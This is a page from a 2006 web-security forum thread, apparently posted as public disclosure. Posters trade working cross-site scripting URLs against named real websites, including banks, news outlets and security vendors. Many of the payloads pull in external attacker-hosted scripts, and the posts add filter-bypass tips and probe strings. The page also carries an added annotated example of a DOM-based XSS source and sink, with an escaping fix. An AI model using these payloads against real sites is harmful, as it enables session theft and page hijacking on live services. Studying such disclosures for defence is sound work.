Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
Current Page: 7 of 65
Re: So it begins
Posted by: tsar
Date: September 25, 2006 10:39PM

[www.pepperjam.com]

This site has also had SQL injection vulns which revealed their AES encryption key. Seems they fixed that, but not the XSS.

Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:48PM

http://national.citysearch.com/search?x=0&y=0&search_select=on&init_search=1&context=directory&miles=99&pre_geo_id2=&request_market_only=&query=%3cscript%20src%3Dhttp://ha.ckers.org/s.js%3e%3c/script%3e&cslink=cs_topbar_search&pre_csz=&pre_geo_id1=&store_where_for_comparison=USA&started=1&hotelAttraction=

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 10:51PM

Anyone need a home loan? https://www.wamuhomeloans.com/cgi-bin/mqinterconnect.cgi?link=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:56PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.anywho.com/qry/wp_fap&lastname=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit << Anywho.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 10:57PM

This one is interesting because it really is a DOM based XSS (not reflected). Scanners would have a tough time with this one. http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

Here's the offending JavaScript:

// Source: the parameter is read from window.location.search and percent-decoded.
function queryString(key){
    var page = new PageQuery(window.location.search);
    return unescape(page.getValue(key));
}

movie = queryString('movie');
section = queryString('section');
title = queryString('title');
num = queryString('num');
tunein = queryString('tunein');

And then way further down:

// Sink: the decoded value is concatenated straight into markup with no encoding.
document.write( "<span class=\"title\">" + title + "</span><br>" );

- RSnake
Gotta love it. http://ha.ckers.org

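The pattern RSnake quotes above, as an added example that is not part of the original post or of hbo.com's code: the percent-decoding source and the string-concatenation sink rebuilt as pure functions so they can be run outside a browser, beside a hardened version that entity-encodes the value before it reaches markup (and, in a comment, the DOM-API alternative that needs no encoding step at all). The function names, `escapeHtml` and the sample query string are assumptions of this example; the sample uses `&` separators where the page's URL used `+`, and the payload is shortened.

```javascript
// Added example: the vulnerable source/sink pair from the post, rebuilt as pure
// functions next to a hardened form. Function names and the sample query string
// are assumptions of this example, not names from the hbo.com page.

// Equivalent of the page's queryString(): read one parameter out of the query.
// URLSearchParams percent-decodes just like unescape() did, so "%3Cscript%3E"
// comes back as "<script>" and flows on to the sink untouched.
function queryValue(search, key) {
  const value = new URLSearchParams(search).get(key);
  return value === null ? "" : value;
}

// The original sink, document.write("<span class=\"title\">" + title + ...),
// returned as a string here so the result can be inspected outside a browser.
function vulnerableTitleHtml(title) {
  return "<span class=\"title\">" + title + "</span><br>";
}

// Hardened: encode the five HTML metacharacters before the value becomes markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function safeTitleHtml(title) {
  return "<span class=\"title\">" + escapeHtml(title) + "</span><br>";
}

// In a real page, prefer a DOM API to string building so there is no encoding
// step to forget (shown as a comment: there is no DOM when this runs in Node):
//   const span = document.createElement("span");
//   span.className = "title";
//   span.textContent = title;   // rendered as text, never parsed as markup
//   container.append(span, document.createElement("br"));

// Constructed query string modelled on the one in the post (payload shortened).
const SAMPLE_SEARCH =
  "?movie=/av/events/psa/ncta_psa&title=%3Cscript%3Ealert(1)%3C/script%3E%20PSA";

// Runs the same decoded value through both sinks so the difference is visible.
function demo() {
  const title = queryValue(SAMPLE_SEARCH, "title");
  return { vulnerable: vulnerableTitleHtml(title), safe: safeTitleHtml(title) };
}
```

Because the whole round trip happens in the browser, the server log only ever sees a harmless-looking URL; that is why a scanner that watches server responses for the reflected payload misses this class, and why the fix has to be in the client-side code.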
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:01PM

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&sort=date%3AD%3AR%3Ad1&q=%22%3Balert%28%22XSS%22%29%3B%2F%2F

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 11:11PM

h**p://www.beliefnet.com/search/search_site_results.asp?search_for="><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site

^^ not being displayed correctly due to the http regex!


on a side note i would be interested to learn of attack vectors being used.

personally i am testing with <>";=)moocow64 and then viewing/searching the source for moocow and then determining what characters are being echo'd.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/25/2006 11:20PM by digi7al64.

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:21PM

I can't read swedish but I think this is a big site: http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 25, 2006 11:24PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi&chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E - VeriSign via POST


digi7al64, I personally use a modification of the short XSS location - http://ha.ckers.org/xss.html#XSSlocator2

'';!--"/><XSS>=&{()}

Then I search source for XSS and see how it handled it.

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:32PM

(Ericsson.se) it's attack of the Svedes: http://ha.ckers.org/expect.swf?http://www.ericsson.se

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 25, 2006 11:40PM

I think I'm going to make a list of the sites we XSS here. Just for a record.

- Kyran

Re: So it begins
Posted by: maluc
Date: September 26, 2006 01:18AM

wow.. i was gone for a day, and you guys managed to fill up more than a page of posts in this thread.. not to mention being /.'ed ^^

well good job on all of it, i'm glad to see this forum getting more recognition, which'll hopefully bring in more web app sec experts (and web app sploit experts) ..

digital64: the http regex is easily fixed by changing all the " to %22 (and space to %20).. i.e.:
h**p://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site -> http://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script%20src=http://ha.ckers.org/s.js></script>&to_search=whole_site

and as for the test injection i use: asdf'a"s>d<f>g;!-e=+r)(t%y\u/i i
why all the letters in between? because when the website \escapes a lot of the special characters.. it's harder for me to tell which ones when mashed together like ';!--"/>\< .. and i look for the 'asdf' ... but whenever i just randomly throw it into a website i'm visiting, its usually asdf'e"r>t<y> .. because it's fast to type.

kyran: i thought i should do the same for quicker reference, to throw into a sql database including the fields: TLD, vector, vector type, site category, and filter type .. but then i remembered i'm lazy with too many half done projects =__=

-maluc

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 01:42AM

haha maluc, for now I'm just making a LIST of the sites. Once it's done I'll think of making an xml document with it all, including attack vectors etc.

- Kyran

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 01:53AM

Maluc! You've been quoted! I was quoted too but it wasn't long enough to warrant a name. :P

http://weblog.infoworld.com/techwatch/archives/008062.html

- Kyran

Re: So it begins
Posted by: maluc
Date: September 26, 2006 01:53AM

and since we've been giving other sites the same treatment for mentioning sla.ckers:
http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

i'll save myself the effort of checking slashdot though.. won't be as easy to find one.

-maluc

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 02:17AM

Slashdot would be a mission and a half.

- Kyran

Re: So it begins
Posted by: maluc
Date: September 26, 2006 02:20AM

also: http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=--%3E%3Cscript%3Eeval('if(document.getElementById(%22COPYRIGHTContainer%22).innerHTML!%3D%22%22)%7Bdocument.getElementById(%22COPYRIGHTContainer%22).innerHTML%3D%22%22;alert(%22XSS%22);%7D');%3C/script%3E%3Cb%22&site_id=3600005&_requestid=192557

it is quite spammy with its injection, so i added the check to only run once..

btw digital64: you also have to hex-encode brackets for link posting here, { -> %7B , } -> %7D ..

-maluc

Re: So it begins
Posted by: digi7al64
Date: September 26, 2006 02:57AM

for maluc...

http://subscribe.infoworld.com/cgi-win/ifwd.cgi?e=%22%3E%3Cscript%20src=http://digi.whiteacid.org/xss.js%3E%3C/script%3E&x=0&y=0&m=newsletter

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/26/2006 04:37AM by digi7al64.

Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:28AM

More links about this part of the forum, gentlemen:
http://www.techworld.com/security/news/index.cfm?newsID=6966&pagtype=all

and: http://www.pcadvisor.co.uk/news/index.cfm?newsid=7175

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 10:48AM

Wow. 9 Articles about this specific thread so far.
Now if only we could get on news.com.com

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:53AM

By get on there do you mean find an XSS, or... ? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 10:55AM

Ahaha. Either way. Although I'm not sure how happy they would be if we found one before they post about us. ;)

- Kyran

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 11:24AM

I couldn't help myself.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://news.com.com/2113-1038_3-6119515.html&toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E <-- news.com.com

- Kyran

Re: So it begins
Posted by: maluc
Date: September 26, 2006 11:54AM

lol, i didn't even notice that you said i was quoted, kyran.. how nice. ^^
i guess my rants are good for something..

anyway, thanks for the dedication digital ^^ .. and i'll go ahead and continue with the new site auditing:

http://www.techworld.com/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Cb+%22&Search=SEARCH&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&search_news=1&search_reviews=1&search_blogs=1&search_whitepapers=1&search_insight=1&search_casestudies=1&search_howto=1&search_briefings=1&search_interviews=1 html tag breakout
http://www.techworld.com/search/index.cfm?fuseaction=dosearch&channel_search=channel&search_reviews=1&search_news=1&search_insight=1&search_howto=1&search_whitepapers=1&search_casestudies=1&search_briefings=1&search_interviews=1&search_blogs=1&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Go=Go javascript function call breakout
http://www.techworld.com/account/login/index.cfm?fuseaction=login&currentloc=%2Fabout%2Fcommercial.cfm&currentlocparms=&userid=XSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&password=apple&login=login no breakout needed
http://www.pcadvisor.co.uk/search/index.cfm?thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=GO&action=dosearch&search_news=1&search_reviews=1&search_features=1&search_blogs=1&search_downloads=1&searchorigin=header same javascript function call breakout (they're owned by the same company, IDG)

off to make some breakfast.. with a nice bit of ego boost :3

-maluc

Re: So it begins
Posted by: maluc
Date: September 26, 2006 12:04PM

kyran, although i think you said you use opera .. (in which i recommend opera8.54, because it's the only view source that shows the changes, if the site/page.pl name doesn't change)

..but the WebDeveloper extension for firefox has an extremely useful feature for converting all POSTs to GETs .. as most POSTs still work, when submitted as GET

to expand on your find: http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91

-maluc

Re: So it begins
Posted by: maluc
Date: September 26, 2006 12:17PM

http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 no breakout, only double quotes " are filtered
http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 again, same javascript function call breakout

digit is owned by the same company as MacWorld, TechWorld, and PCAdvisor .. so they all have similar holes but each its own unique one too _-_

-maluc

Re: So it begins
Posted by: Kyran
Date: September 26, 2006 04:09PM

With all the media attention on XSS now, one would think that people would act on this information. But we still find XSS vulnerabilities in major sites, even ones that report on XSS being an issue! The problem is that most web developers have no security training at all.

It seems "Email to a friend"-style pages are almost always vulnerable to it.

- Kyran

Re: So it begins
Posted by: kirke
Date: September 26, 2006 04:51PM

are you hacker safe?

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

try to key in your company name ...

Re: So it begins
Posted by: maluc
Date: September 26, 2006 05:58PM

kirke: that works in IE and opera .. but not firefox, because the ending " in the link is unnecessary (the site adds one in too)

good work though, and it's sad to see who passes themselves off as web application security consultants and experts these days =.= .. their associate's degree in web design and https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 membership is hardly worth the paper the check was written on to buy them. I'm not really sure what they spend their time doing during their 'audits' .. but this is stuff i could likely teach a ten year old to find, after two hours of explaining.

This is in no offense to the legitimately well-informed webappsec professionals out there, but you're about as rare as an xss-free site - and we all know how rare that is..

-maluc

Re: So it begins
Posted by: maluc
Date: September 26, 2006 09:21PM

some more scanalert ones: https://www.scanalert.com/Content.sa?sec=2&sub=4&send=Y&ref=&rid=&region=EN&name=XSS0%22+onmouseover%3D%22alert%28%27XSS0%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&company=XSS1%22+onmouseover%3D%22alert%28%27XSS1%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&url=XSS2%22+onmouseover%3D%22alert%28%27XSS2%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&phone=XSS3%22+onmouseover%3D%22alert%28%27XSS3%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&ext=XSS4%22+onmouseover%3D%22alert%28%27XSS4%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&email=XSS5%22+onmouseover%3D%22alert%28%27XSS5%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22 automagic in FF, mouseover any field in other browsers

and i love seeing the 11,400 views for this thread _-_

-maluc
